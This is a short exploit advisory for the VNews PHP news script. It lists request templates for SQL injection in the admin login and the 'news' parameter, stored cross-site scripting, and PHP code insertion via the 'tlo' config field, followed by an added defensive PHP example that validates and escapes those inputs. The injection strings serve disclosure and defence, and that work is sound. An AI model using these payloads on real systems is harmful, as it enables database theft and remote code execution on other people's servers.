PoC/Exploit for Multiple Vulnerabilities in VNews

Published Proof of Concept code - Multiple Vulnerabilities in VNews.

Description: Available
Solution: Not available - check vendor's website

SQL Injection Example 1:

URL: http://[host]/vnews/admin/admin.php
login: ' and [sql_expression]/*


SQL Injection Example 2:

URL: http://[host]/vnews/news.php?co=show&news=99'%20union%20select%201,2,3,4,5,6/*&nom=1


Cross-Site Scripting Example:

URL: http://[host]/vnews/news.php?co=show&news=2&nom=1
Autor: [XSS]
Tresc: [XSS]


PHP Code Insertion Example:

URL: http://[host]/vnews/admin/admin.php?k=config
tlo: #BCCBCD"; [php_code] $aa="
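
Input handling that would reject the request shapes listed above, as an added example (not VNews code and not from the advisory). The vn_* function names are hypothetical, and the example assumes that news is a numeric record id, that tlo is a six-digit hex colour, and that the config is stored as a PHP source file, which the quote-breaking tlo value implies.

```php
<?php
// Added example: hypothetical helpers, not part of VNews.

// 'news' is used as a record number in the URLs above, so accept
// plain decimal digits only and hand the query an int, never the raw string.
function vn_int_param(array $src, string $key): ?int
{
    $v = $src[$key] ?? null;
    if (!is_string($v) || !preg_match('/\A[0-9]{1,9}\z/', $v)) {
        return null;
    }
    return (int) $v;
}

// 'tlo' carries a colour such as #BCCBCD (assumed format): allow-list that
// exact shape so a quote or semicolon can never reach the config file.
function vn_colour(string $v): ?string
{
    return preg_match('/\A#[0-9A-Fa-f]{6}\z/', $v) ? strtoupper($v) : null;
}

// Build the config file with var_export(), which escapes every value as a
// PHP literal, instead of concatenating input between double quotes.
function vn_render_config(array $settings): string
{
    return "<?php\nreturn " . var_export($settings, true) . ";\n";
}

// Encode stored Autor/Tresc values at output time so markup is displayed,
// not interpreted by the browser.
function vn_html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs mirroring the request shapes listed above.
$query = ['news' => "99' union select 1,2,3,4,5,6/*", 'nom' => '1'];
var_dump(vn_int_param($query, 'news'));            // rejected: not digits only
var_dump(vn_int_param($query, 'nom'));             // accepted as an integer

var_dump(vn_colour('#BCCBCD"; [php_code] $aa="')); // rejected: not a hex colour
var_dump(vn_colour('#bccbcd'));                    // accepted and normalised

// Even a value that skipped validation is written as an escaped literal.
echo vn_render_config(['tlo' => "#BCCBCD'; [php_code] \$aa='"]);
echo vn_html('<b>Autor</b> "Tresc"'), "\n";
```

The admin login field from Example 1 is free text rather than a number, so it needs a bound parameter in a prepared statement instead of an allow-list.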
